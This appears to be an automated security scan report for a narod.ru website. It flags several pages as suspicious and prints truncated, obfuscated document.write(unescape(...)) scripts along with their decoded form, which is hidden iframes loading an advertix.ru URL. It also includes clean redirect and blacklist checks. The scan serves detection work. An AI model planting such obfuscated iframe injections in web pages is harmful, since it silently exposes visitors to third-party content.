Scanned pages/files
Request | Server response | Status |
http://imohobodymy.narod.ru/url-385.html | 200 OK Content-Length: 22588 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. document.write(unescape(' %3C%73%63%72%69%70%74%3E%0A%76%61%72%20%74%65%6D%70%3D%22%22%2C%69%2C%63%3D%30%2C%6F%75%74%3D%22%22%3B%20%76%61%72%20%73%74%72%3D%22%36%30%21%31%31%35%21%39%39%21%31%31%34%21%31%30%35%21%31%31%32%21%31%31%36%21%36%32%21%31%30%21%31%31%38%21%39%37%21%31%31%34%21%33%32%21%31%31%36%21%31%30%31%21%31%30%39%21%31%31%32%21%36%31%21%33%34%21%33%34%21%34%34%21%31%30%35%21%34%34%21%39%39%21%36%31%21%34%38%21%34%34%21%31%31%31 ...[3552 bytes skipped]... Decoded script: <table align=center> <tr> <td> <iframe src='http://advertix.ru/go/go.php?sid=7' id="myFrame" frameborder="0" vspace="0" hspace="0" marginwidth="0" marginheight="0" width="800" scrolling="no" height="450" > </iframe> </td> </tr> </table> <tr> <td> <iframe src='http://advertix.ru/go/go.php?sid=7' id="myFrame" frameborder="0" vspace="0" hspace="0" marginwidth="0" marginheight="0" width="800" scrolling="no" ...[383 bytes skipped]... | ||
http://s201.ucoz.net/cgi/uutils.fcg?a=get_preroll_cookie&r=0.694717350498074 | 200 OK Content-Length: 25 Content-Type: application/javascript | clean |
http://imohobodymy.narod.ru/abnl/?adsdata=6Vn9w5sqxfcJJrGwUBNewCND391nrEVh7vWeWCH4zIQrqaQdU5n8cqUjuKtj^jKbqjs;2h0qL!Etv3IepIXyl89SV;UIp;da^KD!e3Zj1zZdbZ2ULTk3vYf7qRs0mmP!;QgbDbTO2ugWNbznqNWMz1iWEr^Rl!eO0uWFXvWVjYCsdsPnAL3dc!6;Q2PGCC45Ifwo | 200 OK Content-Length: 2533 Content-Type: application/javascript | clean |
http://imohobodymy.narod.ru/sitemap.html | 200 OK Content-Length: 52742 Content-Type: text/html | clean |
http://s201.ucoz.net/cgi/uutils.fcg?a=get_preroll_cookie&r=0.559008778887712 | 200 OK Content-Length: 25 Content-Type: application/javascript | clean |
http://imohobodymy.narod.ru/abnl/?adsdata=Rggv!!Rf8appN8TBH;tH4KNhjsxhPBxMZkgh7ZMv2!868T59dXPiIc0NbMJTz0LIRu45JDjkFOpUi8t1AUk^eiaSY;D6Z5OcTG12N3M9FzOLUUFOcxQlue0MAEWeu0d7K!MF94luCed4K7gxFuvygbH1W0g4bSVl9xFBLp7ITDD9RX0EaVwZ0FytOULJ8af8u4io | 200 OK Content-Length: 2521 Content-Type: application/javascript | clean |
http://imohobodymy.narod.ru/ | 200 OK Content-Length: 22192 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. document.write(unescape(' %3C%73%63%72%69%70%74%3E%0A%76%61%72%20%74%65%6D%70%3D%22%22%2C%69%2C%63%3D%30%2C%6F%75%74%3D%22%22%3B%20%76%61%72%20%73%74%72%3D%22%36%30%21%31%31%35%21%39%39%21%31%31%34%21%31%30%35%21%31%31%32%21%31%31%36%21%36%32%21%31%30%21%31%31%38%21%39%37%21%31%31%34%21%33%32%21%31%31%36%21%31%30%31%21%31%30%39%21%31%31%32%21%36%31%21%33%34%21%33%34%21%34%34%21%31%30%35%21%34%34%21%39%39%21%36%31%21%34%38%21%34%34%21%31%31%31 ...[3552 bytes skipped]... Decoded script: <table align=center> <tr> <td> <iframe src='http://advertix.ru/go/go.php?sid=7' id="myFrame" frameborder="0" vspace="0" hspace="0" marginwidth="0" marginheight="0" width="800" scrolling="no" height="450" > </iframe> </td> </tr> </table> <tr> <td> <iframe src='http://advertix.ru/go/go.php?sid=7' id="myFrame" frameborder="0" vspace="0" hspace="0" marginwidth="0" marginheight="0" width="800" scrolling="no" ...[383 bytes skipped]... | ||
http://s201.ucoz.net/cgi/uutils.fcg?a=get_preroll_cookie&r=0.887887551836677 | 200 OK Content-Length: 25 Content-Type: application/javascript | clean |
http://imohobodymy.narod.ru/abnl/?adsdata=dv^j!FPWcqwICFrXpAVYI7m5aOdaKpxMJxQA^!N;T30CHKfgxcRYyBHbzwCEtlsQCveBIMy!GTLBO1Shc1EYIOQbknnSJZP0NPb9ClgWC9FYU0V0!sJJx6Wjpef5S;SNtUWztWGPuvV^RcYmmyL57UE0xNadu3QX^lxistuVdLLdhfEmfZguUW!DH^TZHWyRL;oo | 200 OK Content-Length: 2517 Content-Type: application/javascript | clean |
http://imohobodymy.narod.ru/?action=login | 200 OK Content-Length: 22192 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. document.write(unescape(' %3C%73%63%72%69%70%74%3E%0A%76%61%72%20%74%65%6D%70%3D%22%22%2C%69%2C%63%3D%30%2C%6F%75%74%3D%22%22%3B%20%76%61%72%20%73%74%72%3D%22%36%30%21%31%31%35%21%39%39%21%31%31%34%21%31%30%35%21%31%31%32%21%31%31%36%21%36%32%21%31%30%21%31%31%38%21%39%37%21%31%31%34%21%33%32%21%31%31%36%21%31%30%31%21%31%30%39%21%31%31%32%21%36%31%21%33%34%21%33%34%21%34%34%21%31%30%35%21%34%34%21%39%39%21%36%31%21%34%38%21%34%34%21%31%31%31 ...[3552 bytes skipped]... Decoded script: <table align=center> <tr> <td> <iframe src='http://advertix.ru/go/go.php?sid=7' id="myFrame" frameborder="0" vspace="0" hspace="0" marginwidth="0" marginheight="0" width="800" scrolling="no" height="450" > </iframe> </td> </tr> </table> <tr> <td> <iframe src='http://advertix.ru/go/go.php?sid=7' id="myFrame" frameborder="0" vspace="0" hspace="0" marginwidth="0" marginheight="0" width="800" scrolling="no" ...[383 bytes skipped]... | ||
http://s201.ucoz.net/cgi/uutils.fcg?a=get_preroll_cookie&r=0.434732307950725 | 200 OK Content-Length: 25 Content-Type: application/javascript | clean |
http://imohobodymy.narod.ru/abnl/?adsdata=FqKw8yeD2^SjqxeSbKz8urF8HSKa0IOWxBW49ztMsmvYiJ25MfC3S;j1Hp9X1AJtZjBrwvRSZS!NGtT9kmcJlFaYySShSkmI9vtMv1ADL;W!b08c;b428JSafWR3gHGVTwdE4MiA^v39FCplr1G57sppMtIIcAlqjaKif;2RPAd2bXw6MGrYZk62x8Ekh196Q2FT | 200 OK Content-Length: 2501 Content-Type: application/javascript | clean |
http://imohobodymy.narod.ru/url-798.html | 200 OK Content-Length: 20626 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. document.write(unescape(' %3C%73%63%72%69%70%74%3E%0A%76%61%72%20%74%65%6D%70%3D%22%22%2C%69%2C%63%3D%30%2C%6F%75%74%3D%22%22%3B%20%76%61%72%20%73%74%72%3D%22%36%30%21%31%31%35%21%39%39%21%31%31%34%21%31%30%35%21%31%31%32%21%31%31%36%21%36%32%21%31%30%21%31%31%38%21%39%37%21%31%31%34%21%33%32%21%31%31%36%21%31%30%31%21%31%30%39%21%31%31%32%21%36%31%21%33%34%21%33%34%21%34%34%21%31%30%35%21%34%34%21%39%39%21%36%31%21%34%38%21%34%34%21%31%31%31 ...[3552 bytes skipped]... Decoded script: <table align=center> <tr> <td> <iframe src='http://advertix.ru/go/go.php?sid=7' id="myFrame" frameborder="0" vspace="0" hspace="0" marginwidth="0" marginheight="0" width="800" scrolling="no" height="450" > </iframe> </td> </tr> </table> <tr> <td> <iframe src='http://advertix.ru/go/go.php?sid=7' id="myFrame" frameborder="0" vspace="0" hspace="0" marginwidth="0" marginheight="0" width="800" scrolling="no" ...[383 bytes skipped]... | ||
http://s201.ucoz.net/cgi/uutils.fcg?a=get_preroll_cookie&r=0.846469064925532 | 200 OK Content-Length: 25 Content-Type: application/javascript | clean |
http://imohobodymy.narod.ru/abnl/?adsdata=;fAOY1bDCelTJ^2f^7RL4FHEWPASdphw;QL0pYIbHC5YmqA;q57NKTRT5Ey!SFEWIll6OzaSb!bjGkDXtsebz1HBuD3K^JAPj8^MphVVkGB6uPTuTzJ^HNtyGV8dkZazlzHzVQafNADO7blbk4hgy^f6TODCkjkEs;W6bUcUBPuWlaO^PIdgYpqnX4EOcJWwpiso | 200 OK Content-Length: 2505 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: imohobodymy.narod.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 22 Jul 2015 05:44:55 GMT
Server: uServ/3.2.2
Content-Type: text/html; charset=UTF-8
Second query (visit from search engine):
GET / HTTP/1.1
Host: imohobodymy.narod.ru
Referer: http://www.google.com/search?q=imohobodymy.narod.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=imohobodymy.narod.ru
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://imohobodymy.narod.ru/
Result: imohobodymy.narod.ru is not infected or malware details are not published yet.